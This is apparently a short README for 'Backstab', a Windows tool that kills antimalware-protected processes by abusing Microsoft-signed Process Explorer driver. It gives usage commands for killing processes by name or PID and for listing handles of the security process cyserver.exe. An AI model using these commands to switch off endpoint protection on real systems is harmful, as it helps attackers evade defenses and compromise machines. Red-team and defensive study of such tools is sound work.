BackStab

Backstab is a tool capable of killing antimalware protected processes by leveraging sysinternals’ Process Explorer (ProcExp) driver, which is signed by Microsoft.

Usage:

# Windows
# kill process name
backstab.exe -n $name -k
 
# kill process by PID
backstab.exe -p $pid -k
 
# list all handles of cyserver
backstab.exe -n cyserver.exe -l